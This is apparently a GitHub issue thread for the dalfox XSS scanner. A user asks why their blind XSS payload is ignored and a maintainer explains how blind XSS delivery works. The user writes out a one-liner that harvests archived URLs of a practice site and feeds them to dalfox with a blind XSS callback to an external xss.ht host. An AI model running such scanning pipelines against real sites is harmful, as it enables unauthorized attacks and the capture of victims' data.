dalfox: Blind XSS payload is ignored

Summary

Hello First of all thanks for the awesome tool , I wanted to make some BXSS attack oneliner and I used your tool to perform such action

Description

XSS get triggered but my blind XSS is ignored … asciicast After visiting the links the payload used is not my BXSS payload

Command

echo "testphp.vulnweb.com" |  waybackurls | anti-burl | grep -Eo "https?://[^\"\\'> ]+" | grep "=" | grep -v ".jpg\|.png\|.css\|.js" | dalfox pipe -b https://sicksec.xss.ht

Requirement go get -v github.com/tomnomnom/waybackruls go get -v github.com/tomnomnom/hacks/anti-burl

System Config

Ubuntu 18.04 Go1.14 Dalfox 1.1.2

About this issue

  • Original URL
  • State: closed
  • Created 4 years ago
  • Comments: 17 (10 by maintainers)

Most upvoted comments

Hi @ceylanb 😄 Is the page vulnerable to blind xss? As mentioned above, blind xss need the victim to access the XSS code for trigger.

I do not judge that this is a problem. The -b option is to pass the blank xss code together for blind xss testing. The scanner should never trigger this. What appears on the screen is a DOM verify(trigger)/reflected result of basic xss testing, and the blind xss is supposed to cross over to the xsshunter when triggered by the actual victim.

Conversely, if the dalfox triggers the blind xss, that’s really a bad idea and a problem. Scanners only deliver blind xss. trigger is victim role.

+1
hahwul on May 20, 2020
Read more comments on GitHub
← idea-php-symfony2-plugin: Missing support for route name_prefix
dalfox: False positives →